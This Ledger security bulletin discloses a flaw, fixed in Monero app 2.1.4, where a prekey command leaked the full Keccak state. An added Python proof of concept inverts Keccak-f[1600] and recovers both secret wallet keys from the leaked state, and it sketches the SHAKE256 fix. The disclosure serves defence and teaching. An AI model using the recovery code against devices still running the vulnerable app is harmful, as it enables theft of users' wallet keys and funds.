
Ledger Security Bulletin 022

Monero secret key recovery through Keccak state exposure

4 June 2026: Monero secret key recovery through Keccak state exposure.

Summary

A vulnerability was identified in the Monero app for Ledger Nano devices where the INS_GET_CHACHA8_PREKEY APDU handler leaked the full 200-byte internal Keccak permutation state instead of a properly derived prekey. Because the Keccak-f permutation is publicly known and invertible, an attacker able to send APDUs to the device could recover the secret view key and secret spend key. The command was reachable without user confirmation.

The vulnerability is fixed in Monero app version 2.1.4.


Description

The Monero app exposes an APDU command INS_GET_CHACHA8_PREKEY used to derive a ChaCha8 prekey for wallet cache encryption. The vulnerable implementation concatenated the secret view key a, the secret spend key b, and a single padding byte 0x8c into a 65-byte buffer, then applied the Keccak-f permutation via monero_keccak_F.

However, instead of returning the intended derived key material, the handler returned the entire 200-byte internal Keccak state (G_monero_vstate.keccakF.acc) to the host.

Keccak-f[1600] is a public, bijective permutation on a 1600-bit (200-byte) state, so anyone holding the complete output state can apply the inverse permutation and obtain the exact input state. Here the permutation was applied only once, to a state that was all zeros apart from the 65 bytes written into it, so the recovered input state is simply a || b || 0x8c followed by 135 zero bytes. An attacker receiving the 200-byte response therefore reads both secret keys straight out of bytes 0..31 and 32..63 of the inverted state; no brute force is involved. This is exactly what a sponge's squeeze step is meant to prevent: squeezed output is only the rate portion of the state, and the hidden capacity portion is what makes the output non-invertible. Returning the whole state removes that protection.


Impact

Exploitation requires that the vulnerable version of the Monero app is installed on the device, the device is unlocked, and the app is open. Additionally, the host machine must be compromised in order to send the malicious APDU command to the app. Under these conditions, an attacker could silently extract both the secret view key and the secret spend key of the user’s Monero wallet without any on-screen confirmation. It should be noted that this attack scenario requires a significant number of prerequisites to be met, which considerably limits its practical exploitability.


Remediation

The vulnerability has been fixed in the Monero app version 2.1.4. The fix introduces the following changes:

  • The prekey derivation now uses SHAKE256 with a proper squeeze operation, ensuring the output is a cryptographically derived value rather than a raw permutation state.
  • A domain separation label is prepended to the input.
  • Only the secret view key is used as input to the derivation, rather than both secret keys.
  • Sensitive intermediate buffers are explicitly cleared after use.
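
The following is an added, self-contained example (not Ledger's or Monero's code) covering both the Description above and the remediation list: a pure-Python Keccak-f[1600] together with its inverse, a model of the vulnerable handler that absorbs a || b || 0x8c into a zero state and returns the whole state, the host-side recovery of a and b by inverting the permutation, and a hashlib-based SHAKE256 derivation in the shape of the fix. All function names, the label bytes in LABEL and the 32-byte output length are assumptions made for illustration; the fixed app's actual label and code are not reproduced here.

```python
# Added worked example (not Ledger's or Monero's code): why handing out the raw
# Keccak state leaks a and b, and the shape of a proper SHAKE256 derivation.
import hashlib
MASK64 = (1 << 64) - 1
RC = [0x0000000000000001, 0x0000000000008082, 0x800000000000808A, 0x8000000080008000,
      0x000000000000808B, 0x0000000080000001, 0x8000000080008081, 0x8000000000008009,
      0x000000000000008A, 0x0000000000000088, 0x0000000080008009, 0x000000008000000A,
      0x000000008000808B, 0x800000000000008B, 0x8000000000008089, 0x8000000000008003,
      0x8000000000008002, 0x8000000000000080, 0x000000000000800A, 0x800000008000000A,
      0x8000000080008081, 0x8000000000008080, 0x0000000080000001, 0x8000000080008008]
ROT = [[0, 36, 3, 41, 18], [1, 44, 10, 45, 2], [62, 6, 43, 15, 61],
       [28, 55, 25, 21, 56], [27, 20, 39, 8, 14]]               # rho offsets, [x][y]

def rol(v, n):                                                  # 64-bit rotate left, n may be negative
    return ((v << (n & 63)) | (v >> (-n & 63))) & MASK64
def bytes_to_lanes(s):                                          # lane index is x + 5*y
    return [int.from_bytes(s[8 * i:8 * i + 8], "little") for i in range(25)]
def lanes_to_bytes(lanes):
    return b"".join(v.to_bytes(8, "little") for v in lanes)
def col_parity(A):
    return [A[x] ^ A[x + 5] ^ A[x + 10] ^ A[x + 15] ^ A[x + 20] for x in range(5)]
def theta_d(C):
    return [C[(x - 1) % 5] ^ rol(C[(x + 1) % 5], 1) for x in range(5)]

def keccak_f(lanes):
    """Keccak-f[1600]: 24 rounds of theta, rho, pi, chi, iota."""
    A = list(lanes)
    for rc in RC:
        A = [a ^ d for a, d in zip(A, theta_d(col_parity(A)) * 5)]          # theta
        B = [0] * 25                                                        # rho + pi
        for x in range(5):
            for y in range(5):
                B[y + 5 * ((2 * x + 3 * y) % 5)] = rol(A[x + 5 * y], ROT[x][y])
        A = [B[i] ^ (~B[(i + 1) % 5 + 5 * (i // 5)] & B[(i + 2) % 5 + 5 * (i // 5)])
             for i in range(25)]                                            # chi
        A[0] ^= rc                                                          # iota
    return A

def _chi_row(r):                                                # chi on one 5-bit row
    return sum((((r >> x) ^ (~(r >> (x + 1) % 5) & (r >> (x + 2) % 5))) & 1) << x for x in range(5))
CHI_INV = {_chi_row(r): r for r in range(32)}                   # a bijection, so tabulate its inverse

def _theta_parity_inverse():
    """theta maps the 320 column parities C to C ^ D(C), an invertible GF(2) linear map; invert it once."""
    bit = lambda x, k: 1 << (64 * (x % 5) + k % 64)            # position of parity bit C[x][k]
    rows = [bit(i // 64, i) ^ bit(i // 64 - 1, i) ^ bit(i // 64 + 1, i - 1) for i in range(320)]
    inv = [1 << i for i in range(320)]                          # Gaussian elimination on [rows | I]
    for c in range(320):
        p = next(r for r in range(c, 320) if (rows[r] >> c) & 1)
        rows[c], rows[p], inv[c], inv[p] = rows[p], rows[c], inv[p], inv[c]
        for r in range(320):
            if r != c and (rows[r] >> c) & 1:
                rows[r] ^= rows[c]
                inv[r] ^= inv[c]
    return inv
THETA_INV = _theta_parity_inverse()

def keccak_f_inv(lanes):
    """Inverse of keccak_f: every step is a bijection, so run them backwards."""
    A = list(lanes)
    for rc in reversed(RC):
        A[0] ^= rc                                              # iota^-1
        B = [0] * 25                                            # chi^-1, one 5-bit row at a time
        for y in range(5):
            for i in range(64):
                row = CHI_INV[sum(((A[x + 5 * y] >> i) & 1) << x for x in range(5))]
                for x in range(5):
                    B[x + 5 * y] |= ((row >> x) & 1) << i
        A = [0] * 25                                            # pi^-1 and rho^-1
        for x in range(5):
            for y in range(5):
                A[x + 5 * y] = rol(B[y + 5 * ((2 * x + 3 * y) % 5)], -ROT[x][y])
        vec = sum(c << (64 * x) for x, c in enumerate(col_parity(A)))   # theta^-1
        C = [sum((bin(THETA_INV[64 * x + k] & vec).count("1") & 1) << k for k in range(64)) for x in range(5)]
        A = [a ^ d for a, d in zip(A, theta_d(C) * 5)]
    return A

def reference_ok():
    """Cross-check keccak_f against hashlib: SHA3-256("") is a single padded block."""
    blk = bytes([0x06]) + bytes(134) + bytes([0x80]) + bytes(64)
    return lanes_to_bytes(keccak_f(bytes_to_lanes(blk)))[:32] == hashlib.sha3_256(b"").digest()

def vulnerable_get_prekey(view_key, spend_key):
    """The flaw as the bulletin describes it: a || b || 0x8c into the zero state, one Keccak-f, whole state returned."""
    buf = view_key + spend_key + b"\x8c" + bytes(135)           # 65 bytes in, rest of the 200-byte state zero
    return lanes_to_bytes(keccak_f(bytes_to_lanes(buf)))

def recover_keys(leaked_state):
    """What a malicious host does with that response: undo the permutation and read a and b."""
    pre = lanes_to_bytes(keccak_f_inv(bytes_to_lanes(leaked_state)))
    if pre[64] != 0x8C or any(pre[65:]):
        raise ValueError("not the single-block state this handler produces")
    return pre[:32], pre[32:64]

LABEL = b"example-chacha8-prekey"      # ASSUMED label; the fixed app's actual label is not shown here
def fixed_get_prekey(view_key):
    """Shape of the fix: SHAKE256 over a domain label and only the view key, squeezing 32 derived bytes."""
    return hashlib.shake_256(LABEL + view_key).digest(32)
```

reference_ok() confirms the permutation against the standard library, and recover_keys(vulnerable_get_prekey(a, b)) returns (a, b) for any 32-byte a and b, which is the entire attack: one APDU response, one inverse permutation, no guessing. Inverting theta is the only step that needs any thought; it is linear on the 320 column parities, so a 320x320 GF(2) inverse computed once at import is enough, while chi is undone per 5-bit row by table lookup. The fixed form never exposes state: SHAKE256's squeeze returns only rate bytes over a capacity the host cannot see, and because the spend key is not an input at all, even a leak of the derived prekey cannot reveal it.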

Users of the Monero app are strongly recommended to update to version 2.1.4 or later.


Timeline

Date            Action
16 March 2026   Vulnerability identified during internal security review.
19 March 2026   Fix developed and merged into a temporary internal repository to ensure deployment before disclosure.
20 March 2026   Monero app version 2.1.4 released with the fix.
3 June 2026     Fix open-sourced.
4 June 2026     Security bulletin published.